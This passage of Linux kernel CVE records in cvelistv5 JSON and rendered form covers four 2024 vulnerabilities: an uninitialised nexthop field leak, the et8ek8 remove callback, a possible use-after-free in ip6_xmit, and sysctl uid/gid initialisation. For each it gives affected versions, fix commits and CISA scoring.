                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.103",
                  "versionStartIncluding": "5.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.44",
                  "versionStartIncluding": "5.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.3",
                  "versionStartIncluding": "5.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "5.3",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: nexthop: Initialize all fields in dumped nexthops\n\nstruct nexthop_grp contains two reserved fields that are not initialized by\nnla_put_nh_group(), and carry garbage. This can be observed e.g. with\nstrace (edited for clarity):\n\n    # ip nexthop add id 1 dev lo\n    # ip nexthop add id 101 group 1\n    # strace -e recvmsg ip nexthop get id 101\n    ...\n    recvmsg(... [{nla_len=12, nla_type=NHA_GROUP},\n                 [{id=1, weight=0, resvd1=0x69, resvd2=0x67}]] ...) = 52\n\nThe fields are reserved and therefore not currently used. But as they are, they\nleak kernel memory, and the fact they are not just zero complicates repurposing\nof the fields for new ends. Initialize the full structure."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:25:54.051Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/fd06cb4a5fc7bda3dea31712618a62af72a1c6cb"
        },
        {
          "url": "https://git.kernel.org/stable/c/5cc4d71dda2dd4f1520f40e634a527022e48ccd8"
        },
        {
          "url": "https://git.kernel.org/stable/c/9e8f558a3afe99ce51a642ce0d3637ddc2b5d5d0"
        },
        {
          "url": "https://git.kernel.org/stable/c/1377de719652d868f5317ba8398b7e74c5f0430b"
        },
        {
          "url": "https://git.kernel.org/stable/c/7704460acd7f5d35eb07c52500987dc9b95313fb"
        },
        {
          "url": "https://git.kernel.org/stable/c/a13d3864b76ac87085ec530b2ff8e37482a63a96"
        },
        {
          "url": "https://git.kernel.org/stable/c/6d745cd0e9720282cd291d36b9db528aea18add2"
        }
      ],
      "title": "net: nexthop: Initialize all fields in dumped nexthops",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42283",
    "datePublished": "2024-08-17T09:08:49.866Z",
    "dateReserved": "2024-07-30T07:40:12.262Z",
    "dateUpdated": "2025-11-03T22:03:26.190Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-38611 (GCVE-0-2024-38611)

Vulnerability from cvelistv5 – Published: 2024-06-19 13:56 – Updated: 2025-11-03 19:30

Title

media: i2c: et8ek8: Don't strip remove function when driver is builtin

Summary

In the Linux kernel, the following vulnerability has been resolved: media: i2c: et8ek8: Don't strip remove function when driver is builtin Using __exit for the remove function results in the remove callback being discarded with CONFIG_VIDEO_ET8EK8=y. When such a device gets unbound (e.g. using sysfs or hotplug), the driver is just removed without the cleanup being performed. This results in resource leaks. Fix it by compiling in the remove callback unconditionally. This also fixes a W=1 modpost warning: WARNING: modpost: drivers/media/i2c/et8ek8/et8ek8: section mismatch in reference: et8ek8_i2c_driver+0x10 (section: .data) -> et8ek8_remove (section: .exit.text)

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/963523600d9f1e36b…
	https://git.kernel.org/stable/c/ece3fc1c101970520…
	https://git.kernel.org/stable/c/04d1086a62ac492eb…
	https://git.kernel.org/stable/c/c1a3803e5bb91c13e…
	https://git.kernel.org/stable/c/43fff07e4b1956d0e…
	https://git.kernel.org/stable/c/904db2ba44ae60641…
	https://git.kernel.org/stable/c/545b215736c5c4b35…

Impacted products

Vendor

Product

Version

Linux

Affected: c5254e72b8edc2ca0a98703e92e8c34959343d2c , < 963523600d9f1e36bc35ba774c2493d6baa4dd8f (git)
Affected: c5254e72b8edc2ca0a98703e92e8c34959343d2c , < ece3fc1c10197052044048bea4f13cfdcf25b416 (git)
Affected: c5254e72b8edc2ca0a98703e92e8c34959343d2c , < 04d1086a62ac492ebb6bb0c94c1c8cb55f5d1f36 (git)
Affected: c5254e72b8edc2ca0a98703e92e8c34959343d2c , < c1a3803e5bb91c13e9ad582003e4288f67f06cd9 (git)
Affected: c5254e72b8edc2ca0a98703e92e8c34959343d2c , < 43fff07e4b1956d0e5cf23717507e438278ea3d9 (git)
Affected: c5254e72b8edc2ca0a98703e92e8c34959343d2c , < 904db2ba44ae60641b6378c5013254d09acf5e80 (git)
Affected: c5254e72b8edc2ca0a98703e92e8c34959343d2c , < 545b215736c5c4b354e182d99c578a472ac9bfce (git)

Linux

Affected: 4.11
Unaffected: 0 , < 4.11 (semver)
Unaffected: 5.10.236 , ≤ 5.10.* (semver)
Unaffected: 5.15.180 , ≤ 5.15.* (semver)
Unaffected: 6.1.133 , ≤ 6.1.* (semver)
Unaffected: 6.6.33 , ≤ 6.6.* (semver)
Unaffected: 6.8.12 , ≤ 6.8.* (semver)
Unaffected: 6.9.3 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T19:30:17.590Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c1a3803e5bb91c13e9ad582003e4288f67f06cd9"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/43fff07e4b1956d0e5cf23717507e438278ea3d9"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/904db2ba44ae60641b6378c5013254d09acf5e80"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/545b215736c5c4b354e182d99c578a472ac9bfce"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/05/msg00045.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/05/msg00030.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-38611",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:13:05.584089Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:53.519Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/media/i2c/et8ek8/et8ek8_driver.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "963523600d9f1e36bc35ba774c2493d6baa4dd8f",
              "status": "affected",
              "version": "c5254e72b8edc2ca0a98703e92e8c34959343d2c",
              "versionType": "git"
            },
            {
              "lessThan": "ece3fc1c10197052044048bea4f13cfdcf25b416",
              "status": "affected",
              "version": "c5254e72b8edc2ca0a98703e92e8c34959343d2c",
              "versionType": "git"
            },
            {
              "lessThan": "04d1086a62ac492ebb6bb0c94c1c8cb55f5d1f36",
              "status": "affected",
              "version": "c5254e72b8edc2ca0a98703e92e8c34959343d2c",
              "versionType": "git"
            },
            {
              "lessThan": "c1a3803e5bb91c13e9ad582003e4288f67f06cd9",
              "status": "affected",
              "version": "c5254e72b8edc2ca0a98703e92e8c34959343d2c",
              "versionType": "git"
            },
            {
              "lessThan": "43fff07e4b1956d0e5cf23717507e438278ea3d9",
              "status": "affected",
              "version": "c5254e72b8edc2ca0a98703e92e8c34959343d2c",
              "versionType": "git"
            },
            {
              "lessThan": "904db2ba44ae60641b6378c5013254d09acf5e80",
              "status": "affected",
              "version": "c5254e72b8edc2ca0a98703e92e8c34959343d2c",
              "versionType": "git"
            },
            {
              "lessThan": "545b215736c5c4b354e182d99c578a472ac9bfce",
              "status": "affected",
              "version": "c5254e72b8edc2ca0a98703e92e8c34959343d2c",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/media/i2c/et8ek8/et8ek8_driver.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.11"
            },
            {
              "lessThan": "4.11",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.236",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.180",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.133",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.33",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.12",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.236",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.180",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.133",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.33",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.12",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.3",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: i2c: et8ek8: Don\u0027t strip remove function when driver is builtin\n\nUsing __exit for the remove function results in the remove callback\nbeing discarded with CONFIG_VIDEO_ET8EK8=y. When such a device gets\nunbound (e.g. using sysfs or hotplug), the driver is just removed\nwithout the cleanup being performed. This results in resource leaks. Fix\nit by compiling in the remove callback unconditionally.\n\nThis also fixes a W=1 modpost warning:\n\n\tWARNING: modpost: drivers/media/i2c/et8ek8/et8ek8: section mismatch in reference: et8ek8_i2c_driver+0x10 (section: .data) -\u003e et8ek8_remove (section: .exit.text)"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:15:15.931Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/963523600d9f1e36bc35ba774c2493d6baa4dd8f"
        },
        {
          "url": "https://git.kernel.org/stable/c/ece3fc1c10197052044048bea4f13cfdcf25b416"
        },
        {
          "url": "https://git.kernel.org/stable/c/04d1086a62ac492ebb6bb0c94c1c8cb55f5d1f36"
        },
        {
          "url": "https://git.kernel.org/stable/c/c1a3803e5bb91c13e9ad582003e4288f67f06cd9"
        },
        {
          "url": "https://git.kernel.org/stable/c/43fff07e4b1956d0e5cf23717507e438278ea3d9"
        },
        {
          "url": "https://git.kernel.org/stable/c/904db2ba44ae60641b6378c5013254d09acf5e80"
        },
        {
          "url": "https://git.kernel.org/stable/c/545b215736c5c4b354e182d99c578a472ac9bfce"
        }
      ],
      "title": "media: i2c: et8ek8: Don\u0027t strip remove function when driver is builtin",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-38611",
    "datePublished": "2024-06-19T13:56:12.742Z",
    "dateReserved": "2024-06-18T19:36:34.942Z",
    "dateUpdated": "2025-11-03T19:30:17.590Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-44985 (GCVE-0-2024-44985)

Vulnerability from cvelistv5 – Published: 2024-09-04 19:54 – Updated: 2025-11-03 22:14

Title

ipv6: prevent possible UAF in ip6_xmit()

Summary

In the Linux kernel, the following vulnerability has been resolved: ipv6: prevent possible UAF in ip6_xmit() If skb_expand_head() returns NULL, skb has been freed and the associated dst/idev could also have been freed. We must use rcu_read_lock() to prevent a possible UAF.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/b3a3d5333c13a1be5…
	https://git.kernel.org/stable/c/c47e022011719fc57…
	https://git.kernel.org/stable/c/975f764e96f71616b…
	https://git.kernel.org/stable/c/38a21c026ed2cc723…
	https://git.kernel.org/stable/c/124b428fe28064c80…
	https://git.kernel.org/stable/c/fc88d6c1f2895a577…
	https://git.kernel.org/stable/c/2d5ff7e339d04622d…

Impacted products

Vendor

Product

Version

Linux

Affected: 81d626b00bdba16504eeae9cc891b18e83a9471a , < b3a3d5333c13a1be57499581eab4a8fc94d57f36 (git)
Affected: ee6b1db17f8287b615448488fc37f42bcfe9ece6 , < c47e022011719fc5727bca661d662303180535ba (git)
Affected: 0c9f227bee11910a49e1d159abe102d06e3745d5 , < 975f764e96f71616b530e300c1bb2ac0ce0c2596 (git)
Affected: 0c9f227bee11910a49e1d159abe102d06e3745d5 , < 38a21c026ed2cc7232414cb166efc1923f34af17 (git)
Affected: 0c9f227bee11910a49e1d159abe102d06e3745d5 , < 124b428fe28064c809e4237b0b38e97200a8a4a8 (git)
Affected: 0c9f227bee11910a49e1d159abe102d06e3745d5 , < fc88d6c1f2895a5775795d82ec581afdff7661d1 (git)
Affected: 0c9f227bee11910a49e1d159abe102d06e3745d5 , < 2d5ff7e339d04622d8282661df36151906d0e1c7 (git)

Linux

Affected: 5.15
Unaffected: 0 , < 5.15 (semver)
Unaffected: 5.15.166 , ≤ 5.15.* (semver)
Unaffected: 6.1.107 , ≤ 6.1.* (semver)
Unaffected: 6.6.48 , ≤ 6.6.* (semver)
Unaffected: 6.10.7 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-44985",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T01:05:42.699758Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-10T01:07:00.575Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:14:33.082Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/ipv6/ip6_output.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "b3a3d5333c13a1be57499581eab4a8fc94d57f36",
              "status": "affected",
              "version": "81d626b00bdba16504eeae9cc891b18e83a9471a",
              "versionType": "git"
            },
            {
              "lessThan": "c47e022011719fc5727bca661d662303180535ba",
              "status": "affected",
              "version": "ee6b1db17f8287b615448488fc37f42bcfe9ece6",
              "versionType": "git"
            },
            {
              "lessThan": "975f764e96f71616b530e300c1bb2ac0ce0c2596",
              "status": "affected",
              "version": "0c9f227bee11910a49e1d159abe102d06e3745d5",
              "versionType": "git"
            },
            {
              "lessThan": "38a21c026ed2cc7232414cb166efc1923f34af17",
              "status": "affected",
              "version": "0c9f227bee11910a49e1d159abe102d06e3745d5",
              "versionType": "git"
            },
            {
              "lessThan": "124b428fe28064c809e4237b0b38e97200a8a4a8",
              "status": "affected",
              "version": "0c9f227bee11910a49e1d159abe102d06e3745d5",
              "versionType": "git"
            },
            {
              "lessThan": "fc88d6c1f2895a5775795d82ec581afdff7661d1",
              "status": "affected",
              "version": "0c9f227bee11910a49e1d159abe102d06e3745d5",
              "versionType": "git"
            },
            {
              "lessThan": "2d5ff7e339d04622d8282661df36151906d0e1c7",
              "status": "affected",
              "version": "0c9f227bee11910a49e1d159abe102d06e3745d5",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/ipv6/ip6_output.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.15"
            },
            {
              "lessThan": "5.15",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.166",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.107",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.48",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.166",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.107",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.48",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.7",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: prevent possible UAF in ip6_xmit()\n\nIf skb_expand_head() returns NULL, skb has been freed\nand the associated dst/idev could also have been freed.\n\nWe must use rcu_read_lock() to prevent a possible UAF."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:30:26.009Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/b3a3d5333c13a1be57499581eab4a8fc94d57f36"
        },
        {
          "url": "https://git.kernel.org/stable/c/c47e022011719fc5727bca661d662303180535ba"
        },
        {
          "url": "https://git.kernel.org/stable/c/975f764e96f71616b530e300c1bb2ac0ce0c2596"
        },
        {
          "url": "https://git.kernel.org/stable/c/38a21c026ed2cc7232414cb166efc1923f34af17"
        },
        {
          "url": "https://git.kernel.org/stable/c/124b428fe28064c809e4237b0b38e97200a8a4a8"
        },
        {
          "url": "https://git.kernel.org/stable/c/fc88d6c1f2895a5775795d82ec581afdff7661d1"
        },
        {
          "url": "https://git.kernel.org/stable/c/2d5ff7e339d04622d8282661df36151906d0e1c7"
        }
      ],
      "title": "ipv6: prevent possible UAF in ip6_xmit()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-44985",
    "datePublished": "2024-09-04T19:54:34.188Z",
    "dateReserved": "2024-08-21T05:34:56.670Z",
    "dateUpdated": "2025-11-03T22:14:33.082Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-42312 (GCVE-0-2024-42312)

Vulnerability from cvelistv5 – Published: 2024-08-17 09:09 – Updated: 2025-11-03 22:04

Title

sysctl: always initialize i_uid/i_gid

Summary

In the Linux kernel, the following vulnerability has been resolved: sysctl: always initialize i_uid/i_gid Always initialize i_uid/i_gid inside the sysfs core so set_ownership() can safely skip setting them. Commit 5ec27ec735ba ("fs/proc/proc_sysctl.c: fix the default values of i_uid/i_gid on /proc/sys inodes.") added defaults for i_uid/i_gid when set_ownership() was not implemented. It also missed adjusting net_ctl_set_ownership() to use the same default values in case the computation of a better value failed.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/b2591c89a6e285879…
	https://git.kernel.org/stable/c/34a86adea1f2b3c3f…
	https://git.kernel.org/stable/c/1deae34db9f4f8e0e…
	https://git.kernel.org/stable/c/ffde3af4b29bf97d6…
	https://git.kernel.org/stable/c/c7e2f43d182f5dde4…
	https://git.kernel.org/stable/c/98ca62ba9e2be5863…

Impacted products

Vendor

Product

Version

Linux

Affected: 5ec27ec735ba0477d48c80561cc5e856f0c5dfaf , < b2591c89a6e2858796111138c38fcb6851aa1955 (git)
Affected: 5ec27ec735ba0477d48c80561cc5e856f0c5dfaf , < 34a86adea1f2b3c3f9d864c8cce09dca644601ab (git)
Affected: 5ec27ec735ba0477d48c80561cc5e856f0c5dfaf , < 1deae34db9f4f8e0e03f891be2e2e15c15c8ac05 (git)
Affected: 5ec27ec735ba0477d48c80561cc5e856f0c5dfaf , < ffde3af4b29bf97d62d82e1d45275587e10a991a (git)
Affected: 5ec27ec735ba0477d48c80561cc5e856f0c5dfaf , < c7e2f43d182f5dde473389dbb39f16c9f0d64536 (git)
Affected: 5ec27ec735ba0477d48c80561cc5e856f0c5dfaf , < 98ca62ba9e2be5863c7d069f84f7166b45a5b2f4 (git)
Affected: e83234d7ef237931148b4b17834dadf57eb46c12 (git)
Affected: 2cbf2af144f0cd08a3361c6299b2e6086b7d21d9 (git)
Affected: 2c7b50c7b1d036f71acd9a917a8cb0f9b6e43dab (git)
Affected: 7eb45a94c279dd5af4cafaa738ae93737517eef4 (git)
Affected: 14cc90952cef94bfa89a6b4a2f55fd9a70f50a16 (git)

Linux

Affected: 5.3
Unaffected: 0 , < 5.3 (semver)
Unaffected: 5.10.224 , ≤ 5.10.* (semver)
Unaffected: 5.15.165 , ≤ 5.15.* (semver)
Unaffected: 6.1.104 , ≤ 6.1.* (semver)
Unaffected: 6.6.45 , ≤ 6.6.* (semver)
Unaffected: 6.10.3 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42312",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:09:55.484877Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-12T17:33:26.909Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:04:29.959Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/proc/proc_sysctl.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "b2591c89a6e2858796111138c38fcb6851aa1955",
              "status": "affected",
              "version": "5ec27ec735ba0477d48c80561cc5e856f0c5dfaf",
              "versionType": "git"
            },
            {
              "lessThan": "34a86adea1f2b3c3f9d864c8cce09dca644601ab",
              "status": "affected",
              "version": "5ec27ec735ba0477d48c80561cc5e856f0c5dfaf",
              "versionType": "git"
            },
            {
              "lessThan": "1deae34db9f4f8e0e03f891be2e2e15c15c8ac05",
              "status": "affected",
              "version": "5ec27ec735ba0477d48c80561cc5e856f0c5dfaf",
              "versionType": "git"
            },
            {
              "lessThan": "ffde3af4b29bf97d62d82e1d45275587e10a991a",
              "status": "affected",
              "version": "5ec27ec735ba0477d48c80561cc5e856f0c5dfaf",
              "versionType": "git"
            },
            {
              "lessThan": "c7e2f43d182f5dde473389dbb39f16c9f0d64536",
              "status": "affected",
              "version": "5ec27ec735ba0477d48c80561cc5e856f0c5dfaf",
              "versionType": "git"
            },
            {
              "lessThan": "98ca62ba9e2be5863c7d069f84f7166b45a5b2f4",
              "status": "affected",
              "version": "5ec27ec735ba0477d48c80561cc5e856f0c5dfaf",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "e83234d7ef237931148b4b17834dadf57eb46c12",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "2cbf2af144f0cd08a3361c6299b2e6086b7d21d9",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "2c7b50c7b1d036f71acd9a917a8cb0f9b6e43dab",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "7eb45a94c279dd5af4cafaa738ae93737517eef4",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "14cc90952cef94bfa89a6b4a2f55fd9a70f50a16",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/proc/proc_sysctl.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.3"
            },
            {
              "lessThan": "5.3",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.224",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.165",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.104",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.45",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.224",
